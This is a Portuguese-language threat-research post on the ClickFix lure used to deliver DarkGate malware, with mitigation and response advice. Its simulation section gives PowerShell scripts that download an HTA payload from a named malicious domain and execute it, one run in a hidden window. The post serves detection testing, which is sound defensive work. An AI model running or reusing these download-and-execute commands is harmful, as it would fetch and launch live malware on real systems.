SOC Prime Bias: Medium

16 Dec 2025 18:08 UTC

Estudo de Caso ClickFix: Malware DarkGate

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Seguir
Estudo de Caso ClickFix: Malware DarkGate
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumo

O relatório descreve um método de engenharia social denominado ClickFix que persuade os usuários a copiar e executar um comando PowerShell, que então baixa um arquivo HTA malicioso. Este arquivo HTA, por sua vez, baixa componentes adicionais, incluindo um script AutoIt que cria diretórios, solta arquivos e estabelece comunicações C2. A atividade é atribuída à campanha DarkGate e depende de ofuscação com base64 além de adulteração da área de transferência para evitar detecção direta.

Investigação

Analistas desvendaram várias camadas de conteúdo codificado em base64 embutido em uma página de alerta de extensão de navegador falsa e recuperaram o comando PowerShell responsável por buscar dark.hta de linktoxic34.com. Quando executado, o HTA implanta um executável AutoIt (fckhffh.a3x) que executa uma rotina DES e lança cargas adicionais. A telemetria de rede capturada mostra tráfego HTTP(S) para o domínio malicioso, seguido pela execução encadeada de script PowerShell.

Mitigação

As defesas recomendadas incluem treinamento de conscientização do usuário para desencorajar a cópia de trechos desconhecidos de código, desabilitar a caixa de diálogo Executar do Windows através da Política de Grupo e implementar soluções antivírus baseadas em comportamento. Bloquear proativamente o domínio malicioso e monitorar execuções anômalas de PowerShell pode reduzir significativamente o risco de infecção pelo DarkGate.

Resposta

Se um evento relacionado ao ClickFix for identificado, isole o endpoint afetado, interrompa todos os processos maliciosos, remova os artefatos HTA e AutoIt, e realize análises forenses em quaisquer pastas criadas durante a intrusão. Atualize a lógica de detecção para sinalizar padrões suspeitos de execução de PowerShell e HTA e assegure-se de que o domínio associado seja bloqueado em todo o ambiente.

Fluxo de Ataque

Execução de Simulação

Pré-requisito: O Cheque Pré-voo de Telemetria & Baseline deve ter sido aprovado.

Fundamentação: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e narrativas DEVEM refletir diretamente os TTPs identificados e visam gerar a telemetria exata esperada pela lógica de detecção.

  • Narrativa & Comandos de Ataque:
    Um atacante que obteve acesso de baixo privilégio em um host Windows comprometido deseja baixar uma carga de HTA maliciosa usada na campanha ClickFix. Para permanecer furtivo, o atacante utiliza PowerShell—uma ferramenta nativa do Windows—para que nenhum binário externo seja introduzido. O comando é executado diretamente no console (ou via uma tarefa agendada) e inclui a URL exata que a regra monitora. O download é armazenado no %TEMP% do usuário e então executado via Start-Process.

    $url = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
    $out = "$env:TEMPdark.hta"
    Invoke-WebRequest -Uri $url -OutFile $out
    Start-Process -FilePath $out
  • Script de Teste de Regressão: (autocontido, reproduz as etapas acima)

    # Simulação de download ClickFix HTA – aciona a regra Sigma
    $maliciousUrl = "https://linktoxic34.com/wp-content/themes/twentytwentytwo/dark.hta"
    $destPath = "$env:TEMPdark.hta"
    
    try {
        Write-Host "[*] Downloading malicious HTA payload..."
        Invoke-WebRequest -Uri $maliciousUrl -OutFile $destPath -UseBasicParsing
        Write-Host "[+] Download complete. Executing payload..."
        Start-Process -FilePath $destPath -WindowStyle Hidden
    } catch {
        Write-Error "Download or execution failed: $_"
    }
  • Comandos de Limpeza: (remove o HTA baixado e qualquer instância em execução)

    # Remove o arquivo HTA e termina qualquer processo residual
    $htaPath = "$env:TEMPdark.hta"
    if (Test-Path $htaPath) {
        Remove-Item $htaPath -Force
        Write-Host "[*] HTA file removed."
    }
    # Mate qualquer processo que possa ter sido lançado a partir do HTA (exemplo genérico)
    Get-Process | Where-Object {$_.Path -like "*dark.hta*"} | Stop-Process -Force